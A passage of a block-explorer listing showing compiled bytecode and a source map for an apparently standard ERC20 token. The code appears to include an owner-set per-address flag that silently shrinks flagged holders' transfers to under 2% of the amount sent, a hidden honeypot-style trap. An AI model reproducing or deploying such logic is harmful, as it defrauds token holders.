1906113fd565b10610ede57610ed782610f77565b9050610ee2565b8190505b9392505050565b600160035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610f7257600260035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f62066a44611b3983610f8a91906118e2565b610f949190611950565b9050919050565b5f80fd5b5f80fd5b5f819050919050565b610fb581610fa3565b8114610fbf575f80fd5b50565b5f81359050610fd081610fac565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f840112610ff757610ff6610fd6565b5b8235905067ffffffffffffffff81111561101457611013610fda565b5b6020830191508360208202830111156110305761102f610fde565b5b9250929050565b5f805f6040848603121561104e5761104d610f9b565b5b5f61105b86828701610fc2565b935050602084013567ffffffffffffffff81111561107c5761107b610f9f565b5b61108886828701610fe2565b92509250509250925092565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156110cb5780820151818401526020810190506110b0565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6110f082611094565b6110fa818561109e565b935061110a8185602086016110ae565b611113816110d6565b840191505092915050565b5f6020820190508181035f83015261113681846110e6565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6111678261113e565b9050919050565b6111778161115d565b8114611181575f80fd5b50565b5f813590506111928161116e565b92915050565b5f80604083850312156111ae576111ad610f9b565b5b5f6111bb85828601611184565b92505060206111cc85828601610fc2565b9150509250929050565b5f8115159050919050565b6111ea816111d6565b82525050565b5f6020820190506112035f8301846111e1565b92915050565b61121281610fa3565b82525050565b5f60208201905061122b5f830184611209565b92915050565b5f805f6060848603121561124857611247610f9b565b5b5f61125586828701611184565b935050602061126686828701611184565b925050604061127786828701610fc2565b9150509250925092565b5f60ff82169050919050565b61129681611281565b82525050565b5f6020820190506112af5f83018461128d565b92915050565b5f602082840312156112ca576112c9610f9b565b5b5f6112d784828501611184565b91505092915050565b6112e98161115d565b82525050565b5f6020820190506113025f8301846112e0565b92915050565b5f806040838503121561131e5761131d610f9b565b5b5f61132b85828601611184565b925050602061133c85828601611184565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806113b757607f821691505b6020821081036113ca576113c9611373565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61140782610fa3565b915061141283610fa3565b925082820190508082111561142a576114296113d0565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61148a60258361109e565b915061149582611430565b604082019050919050565b5f6020820190508181035f8301526114b78161147e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61151860268361109e565b9150611523826114be565b604082019050919050565b5f6020820190508181035f8301526115458161150c565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6115a660248361109e565b91506115b18261154c565b604082019050919050565b5f6020820190508181035f8301526115d38161159a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61163460228361109e565b915061163f826115da565b604082019050919050565b5f6020820190508181035f83015261166181611628565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f61169c601d8361109e565b91506116a782611668565b602082019050919050565b5f6020820190508181035f8301526116c981611690565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61172a60258361109e565b9150611735826116d0565b604082019050919050565b5f6020820190508181035f8301526117578161171e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117b860238361109e565b91506117c38261175e565b604082019050919050565b5f6020820190508181035f8301526117e5816117ac565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61184660268361109e565b9150611851826117ec565b604082019050919050565b5f6020820190508181035f8301526118738161183a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6118ae60208361109e565b91506118b98261187a565b602082019050919050565b5f6020820190508181035f8301526118db816118a2565b9050919050565b5f6118ec82610fa3565b91506118f783610fa3565b925082820261190581610fa3565b9150828204841483151761191c5761191b6113d0565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61195a82610fa3565b915061196583610fa3565b92508261197557611974611923565b5b82820490509291505056fea2646970667358221220fa35d5c821b0c82e1f8adadadc974872cd1dc18bba5157f216ff9a4deb54d52664736f6c63430008160033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fe575f3560e01c806370a0823111610095578063a457c2d711610064578063a457c2d7146102ae578063a9059cbb146102de578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b806370a0823114610238578063715018a6146102685780638da5cb5b1461027257806395d89b4114610290576100fe565b806323b872dd116100d157806323b872dd1461018a578063313ce567146101ba57806339509351146101d85780633fcacaa014610208576100fe565b806305c38bb91461010257806306fdde031461011e578063095ea7b31461013c57806318160ddd1461016c575b5f80fd5b61011c60048036038101906101179190611037565b61035a565b005b610126610421565b604051610133919061111e565b60405180910390f35b61015660048036038101906101519190611198565b6104b1565b60405161016391906111f0565b60405180910390f35b6101746104d3565b6040516101819190611218565b60405180910390f35b6101a4600480360381019061019f9190611231565b6104dc565b6040516101b191906111f0565b60405180910390f35b6101c261050a565b6040516101cf919061129c565b60405180910390f35b6101f260048036038101906101ed9190611198565b610512565b6040516101ff91906111f0565b60405180910390f35b610222600480360381019061021d91906112b5565b610548565b60405161022f9190611218565b60405180910390f35b610252600480360381019061024d91906112b5565b61058e565b60405161025f9190611218565b60405180910390f35b6102706105d4565b005b61027a6105e7565b60405161028791906112ef565b60405180910390f35b61029861060e565b6040516102a5919061111e565b60405180910390f35b6102c860048036038101906102c39190611198565b61069e565b6040516102d591906111f0565b60405180910390f35b6102f860048036038101906102f39190611198565b610713565b60405161030591906111f0565b60405180910390f35b61032860048036038101906103239190611308565b610735565b6040516103359190611218565b60405180910390f35b610358600480360381019061035391906112b5565b6107b7565b005b6103626105e7565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610398575f80fd5b5f5b8282905081101561041b578360035f8585858181106103bc576103bb611346565b5b90506020020160208101906103d191906112b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550808060010191505061039a565b50505050565b606060048054610430906113a0565b80601f016020809104026020016040519081016040528092919081815260200182805461045c906113a0565b80156104a75780601f1061047e576101008083540402835291602001916104a7565b820191905f5260205f20905b81548152906001019060200180831161048a57829003601f168201915b5050505050905090565b5f806104bb610839565b90506104c8818585610840565b600191505092915050565b5f600654905090565b5f806104e6610839565b90506104f3858285610a03565b6104fe858585610a8e565b60019150509392505050565b5f6012905090565b5f8061051c610839565b905061053d81858561052e8589610735565b61053891906113fd565b610840565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105dc610d01565b6105e55f610d7f565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461061d906113a0565b80601f0160208091040260200160405190810160405280929190818152602001828054610649906113a0565b80156106945780601f1061066b57610100808354040283529160200191610694565b820191905f5260205f20905b81548152906001019060200180831161067757829003601f168201915b5050505050905090565b5f806106a8610839565b90505f6106b58286610735565b9050838110156106fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106f1906114a0565b60405180910390fd5b6107078286868403610840565b60019250505092915050565b5f8061071d610839565b905061072a818585610a8e565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107bf610d01565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361082d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108249061152e565b60405180910390fd5b61083681610d7f565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a5906115bc565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361091c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109139061164a565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109f69190611218565b60405180910390a3505050565b5f610a0e8484610735565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a885781811015610a7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a71906116b2565b60405180910390fd5b610a878484848403610840565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610afc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af390611740565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b61906117ce565b60405180910390fd5b5f610b76848484610e40565b90505f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610bfc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf39061185c565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610ce79190611218565b60405180910390a3610cfa858585610ee9565b5050505050565b610d09610839565b73ffffffffffffffffffffffffffffffffffffffff16610d276105e7565b73ffffffffffffffffffffffffffffffffffffffff1614610d7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d74906118c4565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600260035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610ec991906113fd565b10610ede57610ed782610f77565b9050610ee2565b8190505b9392505050565b600160035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610f7257600260035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f62066a44611b3983610f8a91906118e2565b610f949190611950565b9050919050565b5f80fd5b5f80fd5b5f819050919050565b610fb581610fa3565b8114610fbf575f80fd5b50565b5f81359050610fd081610fac565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f840112610ff757610ff6610fd6565b5b8235905067ffffffffffffffff81111561101457611013610fda565b5b6020830191508360208202830111156110305761102f610fde565b5b9250929050565b5f805f6040848603121561104e5761104d610f9b565b5b5f61105b86828701610fc2565b935050602084013567ffffffffffffffff81111561107c5761107b610f9f565b5b61108886828701610fe2565b92509250509250925092565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156110cb5780820151818401526020810190506110b0565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6110f082611094565b6110fa818561109e565b935061110a8185602086016110ae565b611113816110d6565b840191505092915050565b5f6020820190508181035f83015261113681846110e6565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6111678261113e565b9050919050565b6111778161115d565b8114611181575f80fd5b50565b5f813590506111928161116e565b92915050565b5f80604083850312156111ae576111ad610f9b565b5b5f6111bb85828601611184565b92505060206111cc85828601610fc2565b9150509250929050565b5f8115159050919050565b6111ea816111d6565b82525050565b5f6020820190506112035f8301846111e1565b92915050565b61121281610fa3565b82525050565b5f60208201905061122b5f830184611209565b92915050565b5f805f6060848603121561124857611247610f9b565b5b5f61125586828701611184565b935050602061126686828701611184565b925050604061127786828701610fc2565b9150509250925092565b5f60ff82169050919050565b61129681611281565b82525050565b5f6020820190506112af5f83018461128d565b92915050565b5f602082840312156112ca576112c9610f9b565b5b5f6112d784828501611184565b91505092915050565b6112e98161115d565b82525050565b5f6020820190506113025f8301846112e0565b92915050565b5f806040838503121561131e5761131d610f9b565b5b5f61132b85828601611184565b925050602061133c85828601611184565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806113b757607f821691505b6020821081036113ca576113c9611373565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61140782610fa3565b915061141283610fa3565b925082820190508082111561142a576114296113d0565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61148a60258361109e565b915061149582611430565b604082019050919050565b5f6020820190508181035f8301526114b78161147e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61151860268361109e565b9150611523826114be565b604082019050919050565b5f6020820190508181035f8301526115458161150c565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6115a660248361109e565b91506115b18261154c565b604082019050919050565b5f6020820190508181035f8301526115d38161159a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61163460228361109e565b915061163f826115da565b604082019050919050565b5f6020820190508181035f83015261166181611628565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f61169c601d8361109e565b91506116a782611668565b602082019050919050565b5f6020820190508181035f8301526116c981611690565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61172a60258361109e565b9150611735826116d0565b604082019050919050565b5f6020820190508181035f8301526117578161171e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117b860238361109e565b91506117c38261175e565b604082019050919050565b5f6020820190508181035f8301526117e5816117ac565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61184660268361109e565b9150611851826117ec565b604082019050919050565b5f6020820190508181035f8301526118738161183a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6118ae60208361109e565b91506118b98261187a565b602082019050919050565b5f6020820190508181035f8301526118db816118a2565b9050919050565b5f6118ec82610fa3565b91506118f783610fa3565b925082820261190581610fa3565b9150828204841483151761191c5761191b6113d0565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61195a82610fa3565b915061196583610fa3565b92508261197557611974611923565b5b82820490509291505056fea2646970667358221220fa35d5c821b0c82e1f8adadadc974872cd1dc18bba5157f216ff9a4deb54d52664736f6c63430008160033

Deployed Bytecode Sourcemap

81:499:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;338:240;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;918:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3196:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2007:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3955:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1855:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6840:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;215:117:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2171:125:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2458:101:0;;;:::i;:::-;;1835:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1129:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4728:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2492:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2739:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2708:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;338:240:3;446:7;:5;:7::i;:::-;432:21;;:10;:21;;;423:32;;;;;;470:9;465:107;489:6;;:13;;485:1;:17;465:107;;;550:11;523:13;:24;537:6;;544:1;537:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;523:24;;;;;;;;;;;;;;;:38;;;;504:3;;;;;;;465:107;;;;338:240;;;:::o;918:98:1:-;972:13;1004:5;997:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;918:98;:::o;3196:197::-;3279:4;3295:13;3311:12;:10;:12::i;:::-;3295:28;;3333:32;3342:5;3349:7;3358:6;3333:8;:32::i;:::-;3382:4;3375:11;;;3196:197;;;;:::o;2007:106::-;2068:7;2094:12;;2087:19;;2007:106;:::o;3955:286::-;4082:4;4098:15;4116:12;:10;:12::i;:::-;4098:30;;4138:38;4154:4;4160:7;4169:6;4138:15;:38::i;:::-;4186:27;4196:4;4202:2;4206:6;4186:9;:27::i;:::-;4230:4;4223:11;;;3955:286;;;;;:::o;1855:91::-;1913:5;1937:2;1930:9;;1855:91;:::o;6840:234::-;6928:4;6944:13;6960:12;:10;:12::i;:::-;6944:28;;6982:64;6991:5;6998:7;7035:10;7007:25;7017:5;7024:7;7007:9;:25::i;:::-;:38;;;;:::i;:::-;6982:8;:64::i;:::-;7063:4;7056:11;;;6840:234;;;;:::o;215:117:3:-;275:7;301:13;:24;315:9;301:24;;;;;;;;;;;;;;;;294:31;;215:117;;;:::o;2171:125:1:-;2245:7;2271:9;:18;2281:7;2271:18;;;;;;;;;;;;;;;;2264:25;;2171:125;;;:::o;2458:101:0:-;1728:13;:11;:13::i;:::-;2522:30:::1;2549:1;2522:18;:30::i;:::-;2458:101::o:0;1835:85::-;1881:7;1907:6;;;;;;;;;;;1900:13;;1835:85;:::o;1129:102:1:-;1185:13;1217:7;1210:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1129:102;:::o;4728:427::-;4821:4;4837:13;4853:12;:10;:12::i;:::-;4837:28;;4875:24;4902:25;4912:5;4919:7;4902:9;:25::i;:::-;4875:52;;4965:15;4945:16;:35;;4937:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;5056:60;5065:5;5072:7;5100:15;5081:16;:34;5056:8;:60::i;:::-;5144:4;5137:11;;;;4728:427;;;;:::o;2492:189::-;2571:4;2587:13;2603:12;:10;:12::i;:::-;2587:28;;2625;2635:5;2642:2;2646:6;2625:9;:28::i;:::-;2670:4;2663:11;;;2492:189;;;;:::o;2739:149::-;2828:7;2854:11;:18;2866:5;2854:18;;;;;;;;;;;;;;;:27;2873:7;2854:27;;;;;;;;;;;;;;;;2847:34;;2739:149;;;;:::o;2708:198:0:-;1728:13;:11;:13::i;:::-;2816:1:::1;2796:22;;:8;:22;;::::0;2788:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2871:28;2890:8;2871:18;:28::i;:::-;2708:198:::0;:::o;588:96::-;641:7;667:10;660:17;;588:96;:::o;9589:370:1:-;9737:1;9720:19;;:5;:19;;;9712:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9817:1;9798:21;;:7;:21;;;9790:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9899:6;9869:11;:18;9881:5;9869:18;;;;;;;;;;;;;;;:27;9888:7;9869:27;;;;;;;;;;;;;;;:36;;;;9936:7;9920:32;;9929:5;9920:32;;;9945:6;9920:32;;;;;;:::i;:::-;;;;;;;;9589:370;;;:::o;10240:441::-;10370:24;10397:25;10407:5;10414:7;10397:9;:25::i;:::-;10370:52;;10456:17;10436:16;:37;10432:243;;10517:6;10497:16;:26;;10489:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10599:51;10608:5;10615:7;10643:6;10624:16;:25;10599:8;:51::i;:::-;10432:243;10360:321;10240:441;;;:::o;5608:837::-;5750:1;5734:18;;:4;:18;;;5726:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5826:1;5812:16;;:2;:16;;;5804:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;5879:15;5897:38;5918:4;5924:2;5928:6;5897:20;:38::i;:::-;5879:56;;5946:19;5968:9;:15;5978:4;5968:15;;;;;;;;;;;;;;;;5946:37;;6016:6;6001:11;:21;;5993:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;6131:6;6117:11;:20;6099:9;:15;6109:4;6099:15;;;;;;;;;;;;;;;:38;;;;6331:7;6314:9;:13;6324:2;6314:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;6379:2;6364:26;;6373:4;6364:26;;;6383:6;6364:26;;;;;;:::i;:::-;;;;;;;;6401:37;6421:4;6427:2;6431:6;6401:19;:37::i;:::-;5716:729;;5608:837;;;:::o;1993:130:0:-;2067:12;:10;:12::i;:::-;2056:23;;:7;:5;:7::i;:::-;:23;;;2048:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1993:130::o;3060:187::-;3133:16;3152:6;;;;;;;;;;;3133:25;;3177:8;3168:6;;:17;;;;;;;;;;;;;;;;;;3231:8;3200:40;;3221:8;3200:40;;;;;;;;;;;;3123:124;3060:187;:::o;12128:324:1:-;12253:7;12345:1;12324:13;:17;12338:2;12324:17;;;;;;;;;;;;;;;;12302:13;:19;12316:4;12302:19;;;;;;;;;;;;;;;;:39;;;;:::i;:::-;:44;12298:148;;12369:22;12384:6;12369:14;:22::i;:::-;12362:29;;;;12298:148;12429:6;12422:13;;12128:324;;;;;;:::o;11368:176::-;11511:1;11490:13;:17;11504:2;11490:17;;;;;;;;;;;;;;;;:22;11486:52;;11535:1;11515:13;:17;11529:2;11515:17;;;;;;;;;;;;;;;:21;;;;11486:52;11368:176;;;:::o;10687:93::-;10744:7;10772:6;10765:4;10761:1;:8;;;;:::i;:::-;:17;;;;:::i;:::-;10754:24;;10687:93;;;:::o;88:117:4:-;197:1;194;187:12;211:117;320:1;317;310:12;334:77;371:7;400:5;389:16;;334:77;;;:::o;417:122::-;490:24;508:5;490:24;:::i;:::-;483:5;480:35;470:63;;529:1;526;519:12;470:63;417:122;:::o;545:139::-;591:5;629:6;616:20;607:29;;645:33;672:5;645:33;:::i;:::-;545:139;;;;:::o;690:117::-;799:1;796;789:12;813:117;922:1;919;912:12;936:117;1045:1;1042;1035:12;1076:568;1149:8;1159:6;1209:3;1202:4;1194:6;1190:17;1186:27;1176:122;;1217:79;;:::i;:::-;1176:122;1330:6;1317:20;1307:30;;1360:18;1352:6;1349:30;1346:117;;;1382:79;;:::i;:::-;1346:117;1496:4;1488:6;1484:17;1472:29;;1550:3;1542:4;1534:6;1530:17;1520:8;1516:32;1513:41;1510:128;;;1557:79;;:::i;:::-;1510:128;1076:568;;;;;:::o;1650:704::-;1745:6;1753;1761;1810:2;1798:9;1789:7;1785:23;1781:32;1778:119;;;1816:79;;:::i;:::-;1778:119;1936:1;1961:53;2006:7;1997:6;1986:9;1982:22;1961:53;:::i;:::-;1951:63;;1907:117;2091:2;2080:9;2076:18;2063:32;2122:18;2114:6;2111:30;2108:117;;;2144:79;;:::i;:::-;2108:117;2257:80;2329:7;2320:6;2309:9;2305:22;2257:80;:::i;:::-;2239:98;;;;2034:313;1650:704;;;;;:::o;2360:99::-;2412:6;2446:5;2440:12;2430:22;;2360:99;;;:::o;2465:169::-;2549:11;2583:6;2578:3;2571:19;2623:4;2618:3;2614:14;2599:29;;2465:169;;;;:::o;2640:246::-;2721:1;2731:113;2745:6;2742:1;2739:13;2731:113;;;2830:1;2825:3;2821:11;2815:18;2811:1;2806:3;2802:11;2795:39;2767:2;2764:1;2760:10;2755:15;;2731:113;;;2878:1;2869:6;2864:3;2860:16;2853:27;2702:184;2640:246;;;:::o;2892:102::-;2933:6;2984:2;2980:7;2975:2;2968:5;2964:14;2960:28;2950:38;;2892:102;;;:::o;3000:377::-;3088:3;3116:39;3149:5;3116:39;:::i;:::-;3171:71;3235:6;3230:3;3171:71;:::i;:::-;3164:78;;3251:65;3309:6;3304:3;3297:4;3290:5;3286:16;3251:65;:::i;:::-;3341:29;3363:6;3341:29;:::i;:::-;3336:3;3332:39;3325:46;;3092:285;3000:377;;;;:::o;3383:313::-;3496:4;3534:2;3523:9;3519:18;3511:26;;3583:9;3577:4;3573:20;3569:1;3558:9;3554:17;3547:47;3611:78;3684:4;3675:6;3611:78;:::i;:::-;3603:86;;3383:313;;;;:::o;3702:126::-;3739:7;3779:42;3772:5;3768:54;3757:65;;3702:126;;;:::o;3834:96::-;3871:7;3900:24;3918:5;3900:24;:::i;:::-;3889:35;;3834:96;;;:::o;3936:122::-;4009:24;4027:5;4009:24;:::i;:::-;4002:5;3999:35;3989:63;;4048:1;4045;4038:12;3989:63;3936:122;:::o;4064:139::-;4110:5;4148:6;4135:20;4126:29;;4164:33;4191:5;4164:33;:::i;:::-;4064:139;;;;:::o;4209:474::-;4277:6;4285;4334:2;4322:9;4313:7;4309:23;4305:32;4302:119;;;4340:79;;:::i;:::-;4302:119;4460:1;4485:53;4530:7;4521:6;4510:9;4506:22;4485:53;:::i;:::-;4475:63;;4431:117;4587:2;4613:53;4658:7;4649:6;4638:9;4634:22;4613:53;:::i;:::-;4603:63;;4558:118;4209:474;;;;;:::o;4689:90::-;4723:7;4766:5;4759:13;4752:21;4741:32;;4689:90;;;:::o;4785:109::-;4866:21;4881:5;4866:21;:::i;:::-;4861:3;4854:34;4785:109;;:::o;4900:210::-;4987:4;5025:2;5014:9;5010:18;5002:26;;5038:65;5100:1;5089:9;5085:17;5076:6;5038:65;:::i;:::-;4900:210;;;;:::o;5116:118::-;5203:24;5221:5;5203:24;:::i;:::-;5198:3;5191:37;5116:118;;:::o;5240:222::-;5333:4;5371:2;5360:9;5356:18;5348:26;;5384:71;5452:1;5441:9;5437:17;5428:6;5384:71;:::i;:::-;5240:222;;;;:::o;5468:619::-;5545:6;5553;5561;5610:2;5598:9;5589:7;5585:23;5581:32;5578:119;;;5616:79;;:::i;:::-;5578:119;5736:1;5761:53;5806:7;5797:6;5786:9;5782:22;5761:53;:::i;:::-;5751:63;;5707:117;5863:2;5889:53;5934:7;5925:6;5914:9;5910:22;5889:53;:::i;:::-;5879:63;;5834:118;5991:2;6017:53;6062:7;6053:6;6042:9;6038:22;6017:53;:::i;:::-;6007:63;;5962:118;5468:619;;;;;:::o;6093:86::-;6128:7;6168:4;6161:5;6157:16;6146:27;;6093:86;;;:::o;6185:112::-;6268:22;6284:5;6268:22;:::i;:::-;6263:3;6256:35;6185:112;;:::o;6303:214::-;6392:4;6430:2;6419:9;6415:18;6407:26;;6443:67;6507:1;6496:9;6492:17;6483:6;6443:67;:::i;:::-;6303:214;;;;:::o;6523:329::-;6582:6;6631:2;6619:9;6610:7;6606:23;6602:32;6599:119;;;6637:79;;: